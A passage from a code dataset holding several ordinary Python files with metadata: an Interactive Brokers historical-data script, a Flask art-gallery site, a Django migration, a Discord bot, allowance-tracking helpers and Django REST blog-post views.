self.endOfHistoricalData = True\n self.historicalDataEnd(self.nextRequestId, '', '')\n #else:\n #self.historicalDataRequestIds.append(self.nextHistoricalDataRequestId)\n #print(\"ADDING sent ID\", self.nextHistoricalDataRequestId)\n\n #if i % 5 == 0 and i != 0: time.sleep(2)\n #if i % 60 == 0 and i != 0: time.sleep(60*10)\n #self.reqHistoricalData(4102, ContractSamples.ETF(), queryTime, \"1 Y\", \"1 day\", \"MIDPOINT\", 1, 1, False, [])\n #self.reqHistoricalData(4104, ContractSamples.ETFOption(), queryTime, \"2 W\", \"5 mins\", \"MIDPOINT\", 1, 1, False, [])\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n\n # ! [reqhistoricaldata]\n def historicalDataEnd(self, reqId: int, start: str, end: str):\n super().historicalDataEnd(reqId, start, end)\n print(\"ADDING received ID\", reqId)\n #self.historicalDataReceivedIds.append(reqId)\n self.historicalDataReceived = True\n if self.endOfHistoricalData:\n self.historicalDataStore()\n print(\"Data Stored\")\n\n @printWhenExecuting\n def historicalDataStore(self):\n self.historicalDataFrame = self.historicalDataFrame.append(pd.DataFrame(self.historical_data,\n columns=[\"reqID\", \"Date\", \"Open\",\n \"High\", \"Low\", \"Close\",\n \"Volume\", \"Count\", \"WAP\"]))\n filename = self.sampleStock.symbol+\".h5\"\n self.historicalDataFrame.Date = pd.to_datetime(self.historicalDataFrame.Date)\n self.historicalDataFrame.set_index(\"Date\", inplace=True)\n print('************* Writing to file', filename, '***********************')\n self.historicalDataFrame.to_hdf(filename, 'df', mode='w')\n\n def historicalDataRequests_cancel(self):\n # Canceling historical data requests\n pass\n #self.cancelHistoricalData(4101)\n #self.cancelHistoricalData(4102)\n #self.cancelHistoricalData(4104)\n\n # ! [nextvalidid]\n #@printWhenExecuting\n def nextValidId(self, orderId: int):\n super().nextValidId(orderId)\n\n #self.nextValidOrderId = orderId\n # ! [nextvalidid]\n print(\"orderId = \", orderId)\n # we can start now\n self.start()\n\n #@printWhenExecuting\n def start(self):\n if self.started:\n return\n\n self.started = True\n print(\"STARTING\")\n\n if self.globalCancelOnly:\n print(\"Executing GlobalCancel only\")\n self.reqGlobalCancel()\n else:\n print(\"Executing requests\")\n #self.reqGlobalCancel()\n #self.marketDataType_req()\n #self.accountOperations_req()\n #self.tickDataOperations_req()\n #self.marketDepthOperations_req()\n #self.realTimeBars_req()\n #self.reqSecDefOptParams(5001, \"SPY\", \"\", \"STK\", 756733)\n self.reqPositions()\n self.positions.pop(\"ANDV\", None)\n self.positions.pop(\"AVY\", None)\n self.positions.pop(\"NDAQ\", None)\n self.positions.pop('MPC', None)\n for stock in self.positions.keys():\n # re-intialize the list, DataFrame and reset endOfHistoricalData before getting the next stock\n self.historical_data = []\n self.historicalDataFrame = pd.DataFrame(columns=[\"reqID\", \"Date\", \"Open\", \"High\", \"Low\",\n \"Close\", \"Volume\", \"Count\", \"WAP\"])\n self.endOfHistoricalData = False\n self.sampleStock.symbol = stock\n self.earliestTradeDate_req()\n self.historicalDataRequests_req()\n #self.optionsOperations_req()\n #self.marketScanners_req()\n #self.reutersFundamentals_req()\n #self.bulletins_req()\n #self.contractOperations_req()\n #self.contractNewsFeed_req()\n #self.miscelaneous_req()\n #self.linkingOperations()\n #self.financialAdvisorOperations()\n #self.orderOperations_req()\n print(\"Executing requests ... finished\")\n\n def keyboardInterrupt(self):\n self.nKeybInt += 1\n if self.nKeybInt == 1:\n self.stop()\n else:\n print(\"Finishing test\")\n self.done = True\n\n def stop(self):\n print(\"Executing cancels\")\n #self.orderOperations_cancel()\n #self.accountOperations_cancel()\n #self.tickDataOperations_cancel()\n #self.marketDepthOperations_cancel()\n #self.realTimeBars_cancel()\n self.historicalDataRequests_cancel()\n #self.optionsOperations_cancel()\n #self.marketScanners_cancel()\n #self.reutersFundamentals_cancel()\n #self.bulletins_cancel()\n print(\"Executing cancels ... finished\")\n\n def nextOrderId(self):\n oid = self.nextValidOrderId\n self.nextValidOrderId += 1\n return oid\n\n\nif __name__ == '__main__':\n SetupLogger()\n app = TestApp()\n app.connect(\"127.0.0.1\", 4001, 0)\n #app.connect(\"127.0.0.1\", 7496, 0)\n\n app.run()\n", "repo_name": "dmitryhits/myIB_API", "sub_path": "IBJts/samples/Python/Testbed/mytestapp.py", "file_name": "mytestapp.py", "file_ext": "py", "file_size_in_byte": 14474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 37, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 43, "usage_type": "attribute"}, {"api_name": "ibapi.wrapper.EWrapper", "line_number": 47, "usage_type": "name"}, {"api_name": "ibapi.wrapper.EWrapper.__init__", "line_number": 49, "usage_type": "call"}, {"api_name": "ibapi.wrapper.EWrapper", "line_number": 49, "usage_type": "name"}, {"api_name": "ibapi.contract.Contract", "line_number": 58, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}, {"api_name": "ibapi.client.EClient", "line_number": 122, "usage_type": "name"}, {"api_name": "ibapi.client.EClient.__init__", "line_number": 124, "usage_type": "call"}, {"api_name": "ibapi.client.EClient", "line_number": 124, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 135, "usage_type": "call"}, {"api_name": "ContractSamples.ContractSamples.USStockAtSmart", "line_number": 141, "usage_type": "call"}, {"api_name": "ContractSamples.ContractSamples", "line_number": 141, "usage_type": "name"}, {"api_name": "queue.Empty", "line_number": 149, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 151, "usage_type": "call"}, {"api_name": "ibapi.comm.read_fields", "line_number": 154, "usage_type": "call"}, {"api_name": "ibapi.comm", "line_number": 154, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 155, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 170, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 187, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 187, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 192, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 193, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 194, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 212, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 212, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 212, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 250, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 301, "usage_type": "call"}]} +{"seq_id": "70871537794", "text": "import sqlite3\nfrom flask import Flask, render_template\nfrom flask import request\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n\n# this code shows all the movements\n@app.route(\"/movements\")\ndef movements():\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Movements\")\n results = cur.fetchall()\n return render_template(\"all_movements.html\", results=results)\n\n\n# this displays the all of artworks in a specific movement\n@app.route(\"/movement/\")\ndef movement(id):\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n # sqlite can't handle really long integers so i added this\n # to prevent the website from breaking\n if id > 999:\n return render_template('404.html')\n # the id is specifying which movement\n cur.execute(\"SELECT name, description FROM Movements WHERE id=?\", (id,))\n mov = cur.fetchone()\n # if the mid doesn't exist return 404\n if not mov:\n return render_template('404.html')\n # the mid is the movement id\n cur.execute(\"SELECT aid, name, image FROM Work WHERE mid=?\", (id,))\n works = cur.fetchall()\n # if there were no works, works will be [] which isn't an error\n return render_template(\n \"movement.html\", name=mov[0], description=mov[1], results=works\n )\n\n\n# this code displays the artwork\n@app.route(\"/work/\")\ndef work(id):\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n # sqlite can't handle really long integers so i added this\n # to prevent the website from breaking\n if id > 999:\n return render_template('404.html')\n # the aid is the artwork's id\n cur.execute(\"SELECT name, description,image FROM Work WHERE aid=?\", (id,))\n work = cur.fetchone()\n # if the aid doesn't exist return 404\n if not work:\n return render_template('404.html')\n return render_template(\n \"work.html\", name=work[0], description=work[1], item=work[2]\n )\n\n\n# this is the code for the artists\n@app.route(\"/artists\")\ndef artists():\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n cur.execute(\"SELECT id, name, image FROM Artist\")\n results = cur.fetchall()\n return render_template(\"all_artists.html\", results=results)\n\n\n# this displays all of the artworks for a specific artist\n@app.route(\"/artist/\")\ndef artist(id):\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n # sqlite can't handle really long integers so i added this\n # to prevent the website from breaking\n if id > 999:\n return render_template('404.html')\n # the id is specifying which artist\n cur.execute(\"SELECT name, description FROM Artist WHERE id=?\", (id,))\n artist = cur.fetchone()\n # if the aid doesn't exist return 404\n if not artist:\n return render_template('404.html')\n # sqlite can't handle really long integers so i added this\n # to prevent the website from breaking\n if id > 999:\n return render_template('404.html')\n # the rid is the artist id\n cur.execute(\"SELECT aid, name, image FROM Work WHERE rid=?\", (id,))\n works = cur.fetchall()\n # if there were no works for this artist works will be [] which isn't an\n # error\n return render_template(\n \"artist.html\", name=artist[0], description=artist[1], results=works\n )\n\n\n# this is the code for the search\n@app.route(\"/search\")\ndef search():\n query = request.args.get('query', type=str)\n\n if not query:\n return render_template(\"home.html\")\n\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n\n # Use a parameterized query to avoid SQL injection\n cur.execute(\n \"SELECT aid, name FROM Work WHERE name LIKE ?\", ('%' + query + '%',)\n )\n wresults = cur.fetchall()\n\n cur.execute(\"SELECT aid, name FROM Work WHERE rid IN \\\n (SELECT id FROM Artist WHERE name LIKE ?)\",\n ('%' + query + '%',))\n aresults = cur.fetchall()\n results = wresults + aresults\n\n # there can be duplicates because a work can appear in wresults and\n # aresults, so i added this to remove them\n results = list(set(results))\n\n cur.close()\n conn.close()\n\n return render_template(\"search.html\", search_query=query, results=results)\n\n\n# this is the code for the 404 page, so the website doesn't break if anyone\n# types something weird in the url bar thing\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html')\n\n\nif __name__ == \"__main__\":\n # listen on all interfaces so I can connect from my phone to test the grid\n app.run(debug=True) # , host='0.0.0.0')\n", "repo_name": "RubyWilkins/ahproject", "sub_path": "routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 4632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 74, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 112, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "29021015415", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('edx_proctoring', '0003_auto_20160101_0525'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='proctoredexamsoftwaresecurereview',\n name='attempt_code',\n field=models.CharField(unique=True, max_length=255, db_index=True),\n ),\n ]\n", "repo_name": "luckyjd/lms_edx", "sub_path": "edx-ficus.3-3/apps/edx/venvs/edxapp/lib/python2.7/site-packages/edx_proctoring/migrations/0004_auto_20160201_0523.py", "file_name": "0004_auto_20160201_0523.py", "file_ext": "py", "file_size_in_byte": 471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "13537068888", "text": "from ast import alias\nfrom unicodedata import name\nimport random\nimport discord\nfrom discord.ext.commands import *\nfrom googleapiclient.discovery import build\nimport json\n\n\napi_key=\"API CUSTOM SEARCH from cloud google\"\n\nintents = discord.Intents.default()\nintents.members = True\nintents.guilds = True\n\nbot = Bot(command_prefix=\".\", intents=intents);\ntoken = \"\" #Token here\n\n@bot.event\nasync def on_ready():\n print(\"ready for using discord bot!\");\n \n\n@bot.command(aliases = ['hi','chào','chao','yo'])\nasync def hello(ctx):\n member = ctx.author\n await ctx.send(f\"{member.mention} quen không mà gọi nhau ?\");\n\n@bot.command(name = \"random\",aliases = ['rd'])\nasync def _random(ctx, min, max):\n member = ctx.author\n embed=discord.Embed(title=\"Anh Tom đỏ đen\", description=\"Gánh nặng luôn đặt lên đôi vai ta\", color=0x5cb85c)\n embed.add_field(name=\"Con số định mệnh:\", value=f\"```{random.randint(int(min),int(max))}```\", inline=True)\n embed.set_footer(text=f\"{member}\")\n await ctx.send(embed=embed)\n\n@bot.command(aliases = ['avt'])\nasync def avatar(ctx, member: discord.Member = None):\n member = ctx.author if not member else member\n embed=discord.Embed(title=f\"Avatar of {member.name}\", color=0x5cb85c)\n embed.set_image(url=member.avatar_url)\n embed.set_footer(text=ctx.message.created_at)\n await ctx.send(embed=embed)\n \n@bot.command(aliases = ['s'])\nasync def search(ctx, *,search):\n temp = search\n randomlist = random.randint(0, 9)\n resource = build(\"customsearch\", \"v1\", developerKey=api_key).cse()\n result = resource.list(\n q=f\"{search}\", cx=\"ID cse.google.com\", searchType=\"image\"\n ).execute()\n url = result[\"items\"][randomlist][\"link\"]\n embed = discord.Embed(title=f\"Ảnh {temp}\")\n embed.set_image(url=url)\n await ctx.send(embed=embed)\nbot.run(token)\n\n", "repo_name": "chuongngxyen/Discord-Bot-TOMMY", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "discord.Intents.default", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 12, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 38, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 40, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "googleapiclient.discovery.build", "line_number": 49, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "71271572036", "text": "\"\"\" childHelpers.py \"\"\"\nfrom datetime import date\nfrom .models import UpdateEvent, Child\nDAYS = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday',\n 'Sunday']\n\ndef calculate_coins(blocks_to_add, current_blocks, current_coins):\n \"\"\" Calculate how many coins to add \"\"\"\n total_blocks = blocks_to_add + current_blocks\n blocks_result = total_blocks % 5 # blocks value cannot exceed 4\n coins_result = total_blocks // 5 # 1 coin is awarded for every 5 blocks\n coins_result += current_coins\n return(blocks_result , coins_result) # return a tuple (blocks, coins)\n\ndef calculate_free_blocks(last_login_date, free_block_day):\n \"\"\" Count how many free blocks days have passed since last login \"\"\"\n\n last_login_weekday = last_login_date.weekday()\n today_weekday = date.today().weekday()\n num_days = (date.today() - last_login_date).days\n\n # Calculate days since most recent free block day\n days_since_free_block_day = ((today_weekday + 7) - free_block_day) % 7\n\n if num_days > days_since_free_block_day:\n blocks_to_add = 1 + (num_days - 1 - days_since_free_block_day) // 7\n else:\n blocks_to_add = 0\n\n print('Last login was {}, which was a {}.'\n .format(str(last_login_date),\n DAYS[last_login_weekday]))\n print('There were {} free block days since last login'.format(\n str(blocks_to_add)))\n\n return blocks_to_add\n\ndef calculate_allowance_to_add(last_login_date, weekly_allowance): \n \"\"\" Calculate daily allowance * number of days \"\"\"\n \n num_days = (date.today() - last_login_date).days\n daily_allowance = weekly_allowance / 7\n allowance_to_add = round(daily_allowance * num_days, 2)\n return allowance_to_add\n \ndef save_auto_dollars(child, old_dollars, dollars_to_add):\n \"\"\" Save new dollars and create UpdateEvent \"\"\"\n new_dollars = old_dollars + dollars_to_add\n reason = 'automatic allowance deposit'\n update_event = UpdateEvent(user=child.user, type=1,\n amount=dollars_to_add, reason=reason)\n child.dollars = new_dollars\n child.save()\n update_event.save()\n\ndef save_auto_blocks(child, old_blocks, new_blocks, blocks_to_add):\n \"\"\" Save new blocks and create UpdateEvent \"\"\"\n \n reason = 'automatic weekly block'\n update_event = UpdateEvent(user=child.user, type=0,\n amount=blocks_to_add, reason=reason)\n child.blocks = new_blocks\n child.save()\n update_event.save()\n \ndef save_auto_coins(child, old_coins, new_coins):\n \"\"\" Save new coins and create UpdateEvent \"\"\"\n \n reason = 'automatic blocks increment'\n update_event = UpdateEvent(user=child.user, type=5,\n amount=new_coins - old_coins, reason=reason)\n child.coins = new_coins\n child.save()\n update_event.save()", "repo_name": "danielsbonnin/b_and_d", "sub_path": "userPortal/childHelpers.py", "file_name": "childHelpers.py", "file_ext": "py", "file_size_in_byte": 2769, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.date.today", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 19, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 20, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "name"}, {"api_name": "models.UpdateEvent", "line_number": 50, "usage_type": "call"}, {"api_name": "models.UpdateEvent", "line_number": 60, "usage_type": "call"}, {"api_name": "models.UpdateEvent", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "23051324502", "text": "from rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.filters import SearchFilter, OrderingFilter\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly, AllowAny\nfrom rest_framework.decorators import api_view, permission_classes\nfrom django.utils.timezone import now\nfrom myblog.permissions import IsAuthorOrReadOnly, IsStaffOrIsSuperUser\nfrom django.http import Http404\n\nfrom .serializers import (\n PostCreateSerializer,\n PostUpdateSerializer,\n PostDetailSerializer,\n PostListSerializer\n)\nfrom comments.api.serializers import DetailCommentSerializer\nfrom comments.models import Comment\n\nfrom posts.models import Post\n\n\nclass CreatePost(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n context ={}\n context['request'] = request\n\n serializer = PostCreateSerializer(data=request.data, context=context)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ListPost(ListAPIView):\n serializer_class = PostListSerializer\n permission_classes = [AllowAny,]\n pagination_class = PageNumberPagination\n filter_backends = (SearchFilter, OrderingFilter)\n search_fields = ('title', 'description', 'author__display_name')\n\n def get_queryset(self):\n return Post.objects.filter(is_draft=False, is_publish=True).order_by('-publish_at')\n\n\nclass ListPostNeedPublish(ListAPIView):\n serializer_class = PostListSerializer\n permission_classes = [IsAuthenticated, IsStaffOrIsSuperUser]\n pagination_class = PageNumberPagination\n filter_backends = (SearchFilter, OrderingFilter)\n search_fields = ('is_draft', 'title', 'description', 'author__display_name')\n\n def get_queryset(self):\n return Post.objects.filter(is_publish=False).order_by('update_at')\n\n\nclass DetailPost(APIView):\n permission_classes = [IsAuthenticatedOrReadOnly, IsAuthorOrReadOnly]\n \n def get_object(self, slug):\n try:\n return Post.objects.get(slug=slug)\n except Post.DoesNotExist:\n raise Http404\n\n def get(self, request, slug, format=None):\n try:\n user = request.user\n except:\n user = None\n context={'request': request}\n post = self.get_object(slug)\n if not post.is_publish:\n if user:\n if user.is_staff or user.is_superuser or post.author == user:\n serializer = PostDetailSerializer(post, context=context)\n return Response(serializer.data)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n post.views = post.views + 1\n post.save()\n serializer = PostDetailSerializer(post, context=context)\n return Response(serializer.data)\n\n def put(self, request, slug, format=None):\n try:\n post = Post.objects.get(slug=slug)\n except Post.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n context={'request': request}\n serializer = PostUpdateSerializer(post, data=request.data, context=context)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated ,IsStaffOrIsSuperUser])\ndef publish_post(request):\n messages = {}\n data = request.data\n try:\n user = request.user\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n \n publish_all = data.get('publish_all', False)\n if publish_all:\n messages['publish_all'] = True\n print(\"ngay khi vao sua doi\")\n try:\n Post.objects.filter(is_draft=False, is_publish=False).update(is_publish=True, publish_by=user, publish_at=now())\n except:\n messages['result_success_all'] = False\n return Response(data=messages, status=status.HTTP_400_BAD_REQUEST)\n messages['result_success_all'] = True\n print('ngay truoc return')\n return Response(data=messages, status=status.HTTP_200_OK)\n \n slugs = data.get('slugs',[])\n results = []\n result_success_all = True\n for slug in slugs:\n message = {}\n slug_dict = dict(slug)\n slug_str = slug.get(\"slug\", '')\n message['slug'] = slug_str\n try:\n post = Post.objects.get(slug=slug_str)\n except Post.DoesNotExist:\n result_success_all = False\n message['result'] = 'not_found'\n results.append(message)\n continue\n\n if post.is_draft:\n result_success_all = False\n message['result'] = 'post is draft'\n results.append(message)\n continue\n\n if post.is_publish:\n message['result'] = 'the post is in public'\n results.append(message)\n continue\n \n post.is_publish = True\n post.publish_by = user\n post.publish_at = now()\n post.save()\n\n message['result'] = 'published successfully'\n results.append(message)\n\n if result_success_all:\n messages['result_success_all'] = True\n else:\n messages['result_success_all'] = False\n messages['results'] = results\n \n return Response(data=messages, status=status.HTTP_200_OK)\n\n\nclass ListCommentsOfPost(ListAPIView):\n serializer_class = DetailCommentSerializer\n permission_classes = [AllowAny,]\n pagination_class = PageNumberPagination\n filter_backends = (SearchFilter, OrderingFilter)\n search_fields = ('body', 'author__display_name')\n\n def get_queryset(self):\n slug = self.kwargs['slug']\n try:\n post = Post.objects.get(slug=slug)\n except:\n return []\n return Comment.objects.filter(post=post, parent_comment=None).order_by('-created_at')\n\n\n\n", "repo_name": "PhamThoai/MyBLog", "sub_path": "backend/posts/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 25, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 26, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 26, "usage_type": "name"}, {"api_name": "serializers.PostCreateSerializer", "line_number": 32, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 36, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 39, "usage_type": "name"}, {"api_name": "serializers.PostListSerializer", "line_number": 40, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 41, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 41, "usage_type": "name"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 43, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 43, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.filter", "line_number": 47, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 47, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 50, "usage_type": "name"}, {"api_name": "serializers.PostListSerializer", "line_number": 51, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 52, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 52, "usage_type": "name"}, {"api_name": "myblog.permissions.IsStaffOrIsSuperUser", "line_number": 52, "usage_type": "name"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 53, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 54, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 54, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 58, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 62, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticatedOrReadOnly", "line_number": 62, "usage_type": "name"}, {"api_name": "myblog.permissions.IsAuthorOrReadOnly", "line_number": 62, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.get", "line_number": 66, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 66, "usage_type": "name"}, {"api_name": "posts.models.Post.DoesNotExist", "line_number": 67, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 67, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 68, "usage_type": "name"}, {"api_name": "serializers.PostDetailSerializer", "line_number": 80, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 81, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 82, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 82, "usage_type": "name"}, {"api_name": "serializers.PostDetailSerializer", "line_number": 86, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 87, "usage_type": "call"}, {"api_name": "posts.models.Post.objects.get", "line_number": 91, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 91, "usage_type": "name"}, {"api_name": "posts.models.Post.DoesNotExist", "line_number": 92, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 92, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 93, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 93, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 93, "usage_type": "name"}, {"api_name": "serializers.PostUpdateSerializer", 